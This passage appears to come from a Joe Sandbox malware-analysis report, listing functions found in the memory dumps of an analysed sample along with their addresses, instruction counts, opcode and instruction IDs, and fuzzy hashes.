                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3a5b50fa5b16177b48a12233577f3a583e34c426bd506a2afa6f78ec559fc30b
                                                        • Instruction ID: 1d4c10fb167813030669640ed9ec9f820ce23a2137588a86cab18d2df098bb66
                                                        • Opcode Fuzzy Hash: 3a5b50fa5b16177b48a12233577f3a583e34c426bd506a2afa6f78ec559fc30b
                                                        • Instruction Fuzzy Hash: 0F210621F0E6C94FEB9B976C98B22A87BE1EF87310F1401BAD15ED72C3D91CA8065340
                                                        Function 00007FFD3496792E Relevance: .1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6230551a60f07fecebfcfab23ae88dde3a77b7fa433fb3e4fd6e8be3483f82ec
                                                        • Instruction ID: 15340864aacd9083c0c95f1fabaf98dd6faf8238603ef7165d3952fb1763a486
                                                        • Opcode Fuzzy Hash: 6230551a60f07fecebfcfab23ae88dde3a77b7fa433fb3e4fd6e8be3483f82ec
                                                        • Instruction Fuzzy Hash: 1621C531B0DA4A4EEB55DB6858A16A877E1FF46330F1401BEC15ED71C7DD1C68069361
                                                        Function 00007FFD34963BB0 Relevance: .1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7813ffb15f171f5d13c6a7c0e6ef6fdb1a76721f4ad1932ba9b4de805b4a20a4
                                                        • Instruction ID: b2c1472f968fe5d8f59048b62e5ed2b6376a17d5c0285d685b7026ec4ee7d51e
                                                        • Opcode Fuzzy Hash: 7813ffb15f171f5d13c6a7c0e6ef6fdb1a76721f4ad1932ba9b4de805b4a20a4
                                                        • Instruction Fuzzy Hash: 4D313910A1C5964AF739831848B55747BE1EF87330B1986FEE58BCB4DFC82CB881A351
                                                        Function 00007FFD349693D2 Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24329f4d1fb557a5165562ae1abdeb01aa5dfa2692c8cf83069fa7e29fec9f8c
                                                        • Instruction ID: 05b400ed23e4827380715a8a6389c8a87466c1b962a1c16856753d7f8f190bd5
                                                        • Opcode Fuzzy Hash: 24329f4d1fb557a5165562ae1abdeb01aa5dfa2692c8cf83069fa7e29fec9f8c
                                                        • Instruction Fuzzy Hash: 5531F910A1C5A64AFB29831844F05B4BB55EF5333171846FEC99BCB59FC82CA881EB61
                                                        Function 00007FFD345AAFFA Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 590912e3689066053018b00c711f1cc33bd94d5e70b495738dded78e0b8fc0b7
                                                        • Instruction ID: 8ac6abf64ea7ed7b334f92371b800cb26de4b4e16e1ce7906ea4693d6afdedcd
                                                        • Opcode Fuzzy Hash: 590912e3689066053018b00c711f1cc33bd94d5e70b495738dded78e0b8fc0b7
                                                        • Instruction Fuzzy Hash: FF319171E2DA4D9FDB96DB54D8A09AC7BB0FF59300F01007AD209E71D2DA386905DB91
                                                        Function 00007FFD3496B2F2 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4528a0469256ba262439099f2fa43e2ac177a70caffc22312c0429cd6140277
                                                        • Instruction ID: 59455f4d90b65d26d8a89b70a3c7bacf0cad493824842ddbfbe36c9706c83b57
                                                        • Opcode Fuzzy Hash: a4528a0469256ba262439099f2fa43e2ac177a70caffc22312c0429cd6140277
                                                        • Instruction Fuzzy Hash: 7921D632B0E2A94FDB02EBAC98B14EA7BB0EF06234B1405BBD149D7193DD1D51469754
                                                        Function 00007FFD345AE750 Relevance: .1, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 336f784e06c032b633a05046fac8a72fcd1b8ff350c063ca18de2809658e4fb1
                                                        • Instruction ID: f81f91e02ffa280dd7976adb5ade4c74743f870dcf06e4e389f9e2c5f114cf49
                                                        • Opcode Fuzzy Hash: 336f784e06c032b633a05046fac8a72fcd1b8ff350c063ca18de2809658e4fb1
                                                        • Instruction Fuzzy Hash: 83315910EDD0978AE76B9B1884B45B47B51EF52305B1846FAC18ACB4CBC82CBC41E382
                                                        Function 00007FFD345A5BC0 Relevance: .1, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9855d39a1f1f552157980c5faad248e9b0ca86d2ba8babd18d5030f69196d40e
                                                        • Instruction ID: d18b4c595f57629dc654a73fc1bdedd2a71d9c3b62913272ae2e1e2e602dc53c
                                                        • Opcode Fuzzy Hash: 9855d39a1f1f552157980c5faad248e9b0ca86d2ba8babd18d5030f69196d40e
                                                        • Instruction Fuzzy Hash: 6E310A10E2E59A4BE7E7861844B49747FF2EF5321571845BAD68BCF0CFC81C6881A341
                                                        Function 00007FFD349667F2 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 45dfe6af3f17a796f80906887b04827f939fbd69ff43494dc0e0dc3ce001581c
                                                        • Instruction ID: 39e42056887649533b496d5418093af5272b4a800054c24d37135a7be675f2d1
                                                        • Opcode Fuzzy Hash: 45dfe6af3f17a796f80906887b04827f939fbd69ff43494dc0e0dc3ce001581c
                                                        • Instruction Fuzzy Hash: A421FB30A1891D8FDF98EB58C4A5AE8B7B1FF59320F4001BED10EE3295CE39AD518B40
                                                        Function 00007FFD345A2FC2 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8460de0115043532fe896759edbd1fa0f0bdb84102e93c4e395a14ffd8fcba32
                                                        • Instruction ID: 0bb60369351b068b733121f03bbca1b415ac3d7631457f2a7c66f6b8cc4e9fe6
                                                        • Opcode Fuzzy Hash: 8460de0115043532fe896759edbd1fa0f0bdb84102e93c4e395a14ffd8fcba32
                                                        • Instruction Fuzzy Hash: E721F631E0891D8FDF99EB58C4A5AECB7B1FF69304F0041AAD04EE3291CA35A9818B40
                                                        Function 00007FFD34960FD2 Relevance: .1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b41328d1a754dde3e8b37b1cc6f0102876b2a71b1922ddb21d5fc80f6fa21f5
                                                        • Instruction ID: 4bb4c2f18db3c20f3f0860504b35d27243e90428f6fbdd892f654860baa99143
                                                        • Opcode Fuzzy Hash: 3b41328d1a754dde3e8b37b1cc6f0102876b2a71b1922ddb21d5fc80f6fa21f5
                                                        • Instruction Fuzzy Hash: 9621FB35E1891D8FDF99DB58C4A6AEDB3B1FF69311F0041AED04EE3295CA39A9418B40
                                                        Function 00007FFD34962052 Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cdcd3167982d8d8131322e9c8ea6127f1d92dc0359cb6fbd55ce3036745fb904
                                                        • Instruction ID: c354ae481d23cf5133c728d198655bdd0bed40d2b016c7102420b7c8e7e52b72
                                                        • Opcode Fuzzy Hash: cdcd3167982d8d8131322e9c8ea6127f1d92dc0359cb6fbd55ce3036745fb904
                                                        • Instruction Fuzzy Hash: D1217171B08A0A9FDB54EB58C4A19A8F7A1FF45320B54417DD21ED7686CF2CBC11DB80
                                                        Function 00007FFD345ABB79 Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 83be1049165cf9cdd42da09339da52b540418ff2a78dbf33a77338aad2bbf03c
                                                        • Instruction ID: f5ef40e45f85431cf935542f3ed405a278dc55631ef49a09bbe3f91283f0f96f
                                                        • Opcode Fuzzy Hash: 83be1049165cf9cdd42da09339da52b540418ff2a78dbf33a77338aad2bbf03c
                                                        • Instruction Fuzzy Hash: 66212E71E1A90D9FDF9ADB58D4A6AEDB7A1FF59310F0000BED10ED3291CE3969418B40
                                                        Function 00007FFD345ACEF0 Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 518ff6ab2333161494c73a10ec9069c66b2e2bddd581173e4c182b2fc8c710f2
                                                        • Instruction ID: 9369f8196c7f21c8fb27e2946c1013222a0b747dd9031ec93d16a22de9b8abf1
                                                        • Opcode Fuzzy Hash: 518ff6ab2333161494c73a10ec9069c66b2e2bddd581173e4c182b2fc8c710f2
                                                        • Instruction Fuzzy Hash: A2216D51E0F6C24FE7A7477C18B40B47FA05F5322071945FBD58ACB0E3EA4C5856A392
                                                        Function 00007FFD34961F79 Relevance: .1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22bf65d68e7b9c2955df26337a162445edc746f83531efbdee427153821248a8
                                                        • Instruction ID: c461ba9b21fe4c6dbaf1b089dd4bc6a2dfa5cf2843e3b268d8688b6a8019190b
                                                        • Opcode Fuzzy Hash: 22bf65d68e7b9c2955df26337a162445edc746f83531efbdee427153821248a8
                                                        • Instruction Fuzzy Hash: 03112932B0D78A5FE76192A448A55B97BE5DF47330F00017FE249DB195CD6C2805E361
                                                        Function 00007FFD34962135 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5988a3d90ff378646119a01e27116a09b249cce8a94bc59158162202e82831d3
                                                        • Instruction ID: 46934f993dc9738abe23947f63e44275d6b5b00777dff9d46e120cf7b5081b67
                                                        • Opcode Fuzzy Hash: 5988a3d90ff378646119a01e27116a09b249cce8a94bc59158162202e82831d3
                                                        • Instruction Fuzzy Hash: 7D11D631B0DA498FEB45FBA898A26EC77E0EF46324F14017EC649D7287CA2C68028751
                                                        Function 00007FFD345ACB09 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ecedf4d1edd6745a5bc2b2c7f2fb13ba583f42cedfc0d69570b4d9186d90b668
                                                        • Instruction ID: 82ea598113919012ba5758f9c84d4f261a95a0681d1645256a3f3b8e89372f39
                                                        • Opcode Fuzzy Hash: ecedf4d1edd6745a5bc2b2c7f2fb13ba583f42cedfc0d69570b4d9186d90b668
                                                        • Instruction Fuzzy Hash: AA115E31F0E6C95FD793966888A45AA3FE4EF47340F400077D149D71D2DE1C6C0A9391
                                                        Function 00007FFD34963BE0 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f3a0f96df8fa5d334131c2a6d729a92ad2c46269a7413f760037dd853e0bdc38
                                                        • Instruction ID: 4a208f027f4a6c1bd1e2c93eb2b6e058f6afea8bf5922774e053876400a2a13a
                                                        • Opcode Fuzzy Hash: f3a0f96df8fa5d334131c2a6d729a92ad2c46269a7413f760037dd853e0bdc38
                                                        • Instruction Fuzzy Hash: D011BB10A1C46646F63C960884B55B473D1EB9A335B55457DE94BCB4CEC92CB891B390
                                                        Function 00007FFD345A3AA3 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4836b1a0b8094b147a99d1cfb026696700644baf8ab008e859f3cebbe1f7bd7
                                                        • Instruction ID: 07af354bf00ef3863f30dcbc1d5b61dc605659e29a7d53f66897c61badfaa9b2
                                                        • Opcode Fuzzy Hash: a4836b1a0b8094b147a99d1cfb026696700644baf8ab008e859f3cebbe1f7bd7
                                                        • Instruction Fuzzy Hash: 1011AF30F1860D8FDBDADB58C8A5A3877E6FF5A305F4001B9D54EC76E1CA28AC418B00
                                                        Function 00007FFD345AE780 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c562a8e0679941253ccff3b82f95dfc3c04ba989b5234d8d949f05494de4030
                                                        • Instruction ID: b3584adca22442fcceb0395008a1b32970e24777c1da4f5644a7c9e06b2a0e0c
                                                        • Opcode Fuzzy Hash: 0c562a8e0679941253ccff3b82f95dfc3c04ba989b5234d8d949f05494de4030
                                                        • Instruction Fuzzy Hash: 8711BB10EDD46B8AF6AB960884F49B47251FF51305B5445F9D58BCB4CAC83CBD81F381
                                                        Function 00007FFD34962C60 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f67f164bd342f8f24542c0a937a0431d5c3de673deedede87a8fd1357fa4d9f
                                                        • Instruction ID: 7d3163173538cd2548d350d0b81c5919435308fb90c581e3a285e60f0d440850
                                                        • Opcode Fuzzy Hash: 8f67f164bd342f8f24542c0a937a0431d5c3de673deedede87a8fd1357fa4d9f
                                                        • Instruction Fuzzy Hash: E0113421B28B4A4EC756EB3984A09FA77D0EF41220B40067FD54EC34D7CF2CB41A9391
                                                        Function 00007FFD345A4C70 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dfd3ec8f108f0322655d713151cde9267cfb05a624ea0bad19ea50cba524015b
                                                        • Instruction ID: 48759985e5924c32f0fb3ba8696e8ebdf07b797039a462e405f9f7233f3c568d
                                                        • Opcode Fuzzy Hash: dfd3ec8f108f0322655d713151cde9267cfb05a624ea0bad19ea50cba524015b
                                                        • Instruction Fuzzy Hash: B4112720728E0A5FD795EF2894A15FA73D1FF85310B90063AD64EC35E6CE2CF5169390
                                                        Function 00007FFD345A4AEE Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c7410c20441a81d229dc76ca81de465a3081011f02928b3bb1beb6ebac49ac1
                                                        • Instruction ID: 63565fcd14fad859f1d83e95c56216601a53d46f1cab4ff3c34865255576d52c
                                                        • Opcode Fuzzy Hash: 3c7410c20441a81d229dc76ca81de465a3081011f02928b3bb1beb6ebac49ac1
                                                        • Instruction Fuzzy Hash: 19114431348A0A4FD74A8F5CE8A07E53391EB86321F60027BDA09C36E0CB6DA9158780
                                                        Function 00007FFD34962ADE Relevance: .1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 040a738578fe14a5c0576599d0dac64c3a777af21c68be5d8f310b3c104e7a6f
                                                        • Instruction ID: 0e9b6a7fef9832fc1720b35f9b93f54f824fc35f692aacd85ee1436c6c489e6c
                                                        • Opcode Fuzzy Hash: 040a738578fe14a5c0576599d0dac64c3a777af21c68be5d8f310b3c104e7a6f
                                                        • Instruction Fuzzy Hash: 7011553134864A4FE70A9B2894A47E87780EF82330F2002BFDA09CB1D5CB6CA555C3A0
                                                        Function 00007FFD345AD67E Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1740eee8ffcd1d3a9b6223defaa0ac276400daafa9afb9e668c625a7103d62d0
                                                        • Instruction ID: cc15c2532414fb9acd3e08b361b8bf6b026569af6bf2a604e0e34ceb2b8adbaf
                                                        • Opcode Fuzzy Hash: 1740eee8ffcd1d3a9b6223defaa0ac276400daafa9afb9e668c625a7103d62d0
                                                        • Instruction Fuzzy Hash: 27118E3134874A4FD7479F1CE8A47E53791EF85310F20017BDA15C72E4C66CA850C381
                                                        Function 00007FFD34968480 Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 19730e135b6549e82c1c6acf23c3616f793e784c45e0356aeef5f39b5fd44ed8
                                                        • Instruction ID: 96a29b9ad63d8b950404bd17e498775ea695d3e4cc5055aafd5a7627958a95c6
                                                        • Opcode Fuzzy Hash: 19730e135b6549e82c1c6acf23c3616f793e784c45e0356aeef5f39b5fd44ed8
                                                        • Instruction Fuzzy Hash: F211592062CB4A4FDB94EB2884A19F577E1EF06234F9005BED64EC35D7DE6CB4069390
                                                        Function 00007FFD345A1A1D Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52e43078f2b14c8d997c662d59421cca154a25c852dd0501628e712841bf4213
                                                        • Instruction ID: b2040ad9af906fe1e62aa943b9e37392082e3248809d2c0800bdfbfe7ccbf8dc
                                                        • Opcode Fuzzy Hash: 52e43078f2b14c8d997c662d59421cca154a25c852dd0501628e712841bf4213
                                                        • Instruction Fuzzy Hash: 57118E31E08A4D8FDF91EF58C4656EE7BF1FF59311F04017AE508E3291DA7898548B80
                                                        Function 00007FFD345A3B07 Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 69912c55cf6d32cdb03b626292c71f08f2a4d27056753251c1e62201e4a264c7
                                                        • Instruction ID: fe6f2cc66deacde72f2f110d3b70231e76c46feaace4a9f326e206c65bd36088
                                                        • Opcode Fuzzy Hash: 69912c55cf6d32cdb03b626292c71f08f2a4d27056753251c1e62201e4a264c7
                                                        • Instruction Fuzzy Hash: 6211FA30704A088FCB99DF18C895A69B7E2FF59305B5142AAD04ED72A6CB75AC418B40
                                                        Function 00007FFD349682FE Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 986854eca2fbaaf36af33288d0861d5c55d3a61fc9a3e3b53fbbbbce0349ac59
                                                        • Instruction ID: 610a40f54ad3aa0910ee8ba2ce917e7f995449517f84ec680b5ca84bc711e611
                                                        • Opcode Fuzzy Hash: 986854eca2fbaaf36af33288d0861d5c55d3a61fc9a3e3b53fbbbbce0349ac59
                                                        • Instruction Fuzzy Hash: 951148302487874FD749CB2C98A4BE43790EF47330F6402AECA49C72D6D65CA544C390
                                                        Function 00007FFD345AD16A Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c65cad11d885e302cd96e5934aa7d78a2ec79f1aea84c373f4c7a6c31fbc7d4d
                                                        • Instruction ID: a1cdd2464293ababf39a5d9882a09e4c3d5dcf10866109e8786dfa65ec495f3a
                                                        • Opcode Fuzzy Hash: c65cad11d885e302cd96e5934aa7d78a2ec79f1aea84c373f4c7a6c31fbc7d4d
                                                        • Instruction Fuzzy Hash: 0201B162B19E4A4BE7A5FE6C84AA5E6F3D1FF64200B50853BD04EC3592DE29B8098740
                                                        Function 00007FFD345A1A30 Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 18eda3f4feb88310a2d7adf61f50b6c75fa52f134f8b33140eeab9f42c767b8b
                                                        • Instruction ID: 6ccc176b2884d3019f7b1da932e81a8549b11996f538294db3cf409bd864ce66
                                                        • Opcode Fuzzy Hash: 18eda3f4feb88310a2d7adf61f50b6c75fa52f134f8b33140eeab9f42c767b8b
                                                        • Instruction Fuzzy Hash: 5F015A30A0890D8FDF90EF98C454AEEBBF5FB99311F00013AE509E3280CA79A8508BD0
                                                        Function 00007FFD349608BE Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
